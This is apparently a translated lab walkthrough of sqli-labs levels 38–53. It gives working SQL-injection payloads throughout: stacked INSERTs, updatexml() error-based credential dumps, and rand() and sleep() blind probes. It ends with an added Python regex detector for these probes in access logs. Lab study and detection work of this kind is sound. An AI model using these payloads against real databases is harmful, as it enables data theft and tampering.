Sqli labs customs clearance summary-page3
2022-07-02 06:50:00 【Xu Jirong】
- less-38 (GET, single quote, mysqli_multi_query() stacked injection)
  - mysqli_multi_query()
  - mysqli_store_result()
  - mysqli_fetch_row()
  - mysqli_more_results()
- less-39 (GET, numeric, mysqli_multi_query() stacked injection)
- less-40 (GET, single quote with bracket, mysqli_multi_query() stacked injection)
- less-41 (GET, numeric, mysqli_multi_query() stacked injection)
- less-42 (POST, single quote, mysqli_multi_query() stacked injection)
- less-43 (POST, single quote with bracket, mysqli_multi_query() stacked injection)
- less-44 (POST, single quote, mysqli_multi_query() stacked injection)
- less-45 (POST, single quote with bracket, mysqli_multi_query() stacked injection)
- less-46 (GET, numeric, ORDER BY error-based echo)
- less-47 (GET, single quote, ORDER BY error-based echo)
- less-48 (GET, numeric, ORDER BY rand() Boolean blind injection)
- less-49 (GET, string, ORDER BY time-based blind injection)
- less-50 (GET, numeric, ORDER BY error-based echo and mysqli_multi_query() stacked injection)
- less-51 (GET, single quote, ORDER BY error-based echo and mysqli_multi_query() stacked injection)
- less-52 (GET, numeric, ORDER BY rand() Boolean blind injection and mysqli_multi_query() stacked injection)
- less-53 (GET, string, ORDER BY time-based blind injection and mysqli_multi_query() stacked injection)
less-38
title: GET - Stacked Query Injection - String
The code has changed compared with the earlier levels:
```php
if (mysqli_multi_query($con1, $sql))
{
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if ($row = mysqli_fetch_row($result))
        {
            echo '<font size = "5" color= "#00FF00">';
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
        // mysqli_free_result($result);
    }
    /* print divider */
    if (mysqli_more_results($con1))
    {
        //printf("-----------------\n");
    }
    //while (mysqli_next_result($con1));
}
```
mysqli_multi_query()
See the PHP documentation for the mysqli_multi_query() function.
Definition and usage:
mysqli_multi_query() executes one or more queries against the database. Multiple queries are separated by semicolons. Unlike mysqli_query(), mysqli_multi_query() can execute several query statements in a single call.
Syntax:
mysqli_multi_query(connection,query);
| Parameter | Description |
|---|---|
| connection | Required. Specifies the MySQL connection to use. |
| query | Required. Specifies one or more queries, separated by semicolons. |
mysqli_store_result()
Definition and usage:
mysqli_store_result() transfers (buffers) the result set returned by the last query; the stored result set can then be used with mysqli_data_seek().
Syntax:
mysqli_store_result ( mysqli $link [, int $option ] )
| Parameter | Description |
|---|---|
| link | Required. The link identifier returned by mysqli_connect() or mysqli_init(). |
mysqli_fetch_row()
Definition and usage:
mysqli_fetch_row() fetches one row from the result set and returns it as an enumerated array.
Syntax:
mysqli_fetch_row(result);
| Parameter | Description |
|---|---|
| result | Required. A result set identifier returned by mysqli_query(), mysqli_store_result() or mysqli_use_result(). |
mysqli_more_results()
Definition and usage:
mysqli_more_results() checks whether a multi-query has more result sets.
Syntax:
mysqli_more_results(connection);
The key to this level is the mysqli_multi_query() function. Because it executes multiple SQL statements at once, we can perform stacked injection: supply several query statements separated by `;`.
So how do we test for stacked injection? Append a `;` and, if no error is raised, the input is probably stackable.
payload:
1';insert into users(id,username,password) values ('20','123','123')-- -

less-39
title: GET - Stacked Query Injection - Intiger based
Same as 38, except that it is numeric stacked injection.
payload:
1;insert into users(id,username,password) values ('21','123','123')-- -

less-40
title: GET - BLIND based - String - Stacked
index.php is stacked injection (or union query) with a `')` closure.
Besides index.php there are other files, but nothing useful was found in them.
less-41
title: GET - BLIND based - Intiger - Stacked
Numeric union query or stacked injection, very similar to 38, 39 and 40.
less-42
title: POST - Error based - String - Stacked
index.php submits the form data to login.php.

Looking at the source code:
First, no character set is configured for the database connection, so wide-byte injection is not possible. However, the login_password field submitted from the front end is not escaped, and the query function is mysqli_multi_query(), which executes multiple statements. That means stacked injection is possible here and any statement can be stacked; there is no demonstration of that here.
If the credentials are correct, it redirects to logged-in.php.
There you can change the password; fill in the form and it is submitted to pass_change.php.
Looking at that source, the input here is escaped, and $_SESSION["username"] is also taken from the database query result, so there is nothing we can manipulate.

The file in the red box (in the screenshot) is exploitable; the other files are not.
less-43
title: POST - Error based String - Stacked with twist
Almost the same stacked injection as 42, except that the closure becomes ('').
less-44
Like level 42.
The difference is that 42 shows the error message on the front end and 44 has that turned off, but it makes no difference to the injection.
less-45
title: POST - Error based - String Stacked - Blind
Level 45 is the same as 43, except that the front-end error display has been removed.
less-46
title: GET - Error based - Numeric - ORDER BY CLAUSE
In this level the parameter is changed to sort; we try ?sort=1
?sort=2
Judging by the title, this is an ORDER BY query sorted by a column number.
Here we can nest an error-based function into the query to extract information.
Because the error-based function displays a limited number of characters (at most 32), there are two approaches:
1. limit, outputting one row at a time
2. substr, cutting the string into pieces (keep each piece within 32 characters)
This time we use substr to cut the string up and extract the information.
Get all databases
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,30)),0)
// XPATH syntax error: '~information_schema,challenges,'
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),30,30)),0)
//XPATH syntax error: '~mysql,omg,performance_schema,s'
....
Get all tables of a given database
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,30)),0)
// XPATH syntax error: '~emails,referers,uagents,users'
Get all field names of a table
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,30)),0)
//XPATH syntax error: '~id,username,password'
Get field value
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(username,'~',password) from users),1,30)),0)
//XPATH syntax error: '~Dumb~Dumb,Angelina~I-kill-you,'
Look at the source code 
less-47
title: GET Error based - String - ORDER BY CLAUSE
Same as 46, except that the closure becomes a single quote:
$sql = "SELECT * FROM users ORDER BY '$id'";
Note that ORDER BY is followed by a number or a column name, and with single quotes the closure can only be a column name; if you fill in anything else, the result is sorted by the first column by default.
We go straight to reading the field values.
Get field value
?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,'~',password) from users),1,30)),0) and '1
//XPATH syntax error: '~Dumb~Dumb,Angelina~I-kill-you,'
less-48
title: GET - Error based - Blind - Numeric - ORDER BY CLAUSE
Entering ?sort=1 and ?sort=2 changes the echo, while ?sort=1' and ?sort=1" give no echo, which indicates a numeric parameter.
Check the database
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,30)),0)
No echo, so error messages are presumably not displayed.
At this point only Boolean blind injection is left, and the question is how to obtain a 0/1 distinction for it.
Here the rand() function is used; combined with order by it has the following effect:
order by rand(false)
order by rand(true)

As mentioned earlier, rand() is a pseudo-random function: with a fixed seed its ordering is fixed, so combined with order by, seeds 0 and 1 produce two distinguishable orderings. We can use this as follows.
Database lookup
?sort=rand(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=105)

And if the guess is wrong:
?sort=rand(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=0)

We can work through it slowly this way, or simply run sqlmap.
less-49
title: GET - Error based - String - Blind - ORDER BY CLAUSE
This level closes with ', so order by rand() can no longer be used; we use time-based blind injection instead.
The principle is:
?sort=1' and if(1=1,sleep(0.05),null) and '0
The complete SQL statement:
SELECT * FROM users ORDER by '1' and if(1=1,sleep(0.1),null) and '0'

Two things are worth noting:
The if statement is only executed when the value following order by is valid.
Before doing the blind injection, try the statement in Navicat and then write the script.
Also, order by traverses every row, so sleep() fires once per row. Choose the sleep() value by feel and don't make it too large; here we use sleep(0.1).
The statement for looking up the database can be written like this:
1' and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=105,sleep(0.1),null) and '1

There are 12 rows in total at 0.1 second each, and the request took a little over 1.4 seconds, which is about right. Guessing tables and fields works the same way, so it is not repeated here.
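The probes used in levels 38, 46, 48 and 49 all travel in the id or sort query parameter, so the same shapes can be matched in web server access logs. The following is an added example, not part of the original post or of sqli-labs: it decodes constructed access-log lines (the log entries, IP and timestamps are made up) and flags the stacked, updatexml(), rand()-based and sleep()-based patterns shown above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not taken from the original post); the
# query strings mirror the probe shapes the walkthrough shows for id and sort.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jul/2022:06:50:01 +0000] "GET /Less-38/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [02/Jul/2022:06:50:02 +0000] "GET /Less-38/?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2720%27,%27123%27,%27123%27)--%20- HTTP/1.1" 200 512
10.0.0.5 - - [02/Jul/2022:06:50:03 +0000] "GET /Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,substr((select%20group_concat(schema_name)%20from%20information_schema.schemata),1,30)),0) HTTP/1.1" 200 700
10.0.0.5 - - [02/Jul/2022:06:50:04 +0000] "GET /Less-48/?sort=rand(ascii(substr((select%20group_concat(schema_name)%20from%20information_schema.schemata),1,1))=105) HTTP/1.1" 200 900
10.0.0.5 - - [02/Jul/2022:06:50:05 +0000] "GET /Less-49/?sort=1%27%20and%20if(1=1,sleep(0.1),null)%20and%20%270 HTTP/1.1" 200 900
10.0.0.5 - - [02/Jul/2022:06:50:06 +0000] "GET /Less-46/?sort=2 HTTP/1.1" 200 512
"""

# One rule per technique; each is run against the percent-decoded value of
# every query parameter, so URL encoding alone does not hide a probe.
RULES = {
    "stacked_query": re.compile(r";\s*(insert|update|delete|drop|create|select)\b", re.I),
    "error_based_xpath": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "orderby_rand_boolean": re.compile(r"\brand\s*\(\s*[^)\s]", re.I),  # rand() given an argument
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\.", re.I),
}
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')


def parse_params(query: str) -> dict:
    """Split a raw query string on & only (never on ;) and percent-decode it."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_value(value: str) -> list:
    """Names of every rule that matches one decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]


def scan_log(text: str) -> list:
    """Return (path, parameter, [rule names]) for each flagged parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for param, value in parse_params(url.query).items():
            names = classify_value(value)
            if names:
                hits.append((url.path, param, names))
    return hits
```

A plain `?sort=2` or a legitimate `rand()` with no argument produces no hit, which keeps the rules usable as a first-pass filter before reviewing the flagged requests by hand.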
less-50
title: GET - Error based - ORDER BY CLAUSE - numeric - Stacked injection
Apart from using mysqli_multi_query(), everything else is the same as 46.
Here we only show how to check for stacking:
Level 46 with ?sort=1;select 1,2,3
Error
Level 50 with ?sort=1;select 1,2,3

Normal echo
less-51
title: GET - Error based - ORDER BY CLAUSE - String - Stacked
The only difference from 47 is the addition of mysqli_multi_query() stacked injection.
less-52
title: GET - Blind based ORDER BY CLAUSE - numeric Stacked injection
The only difference from 48 is the addition of mysqli_multi_query() stacked injection.
less-53
title: GET - Blind based - ORDER BY CLAUSE - String - stacked injection
The only difference from 49 is the addition of mysqli_multi_query() stacked injection.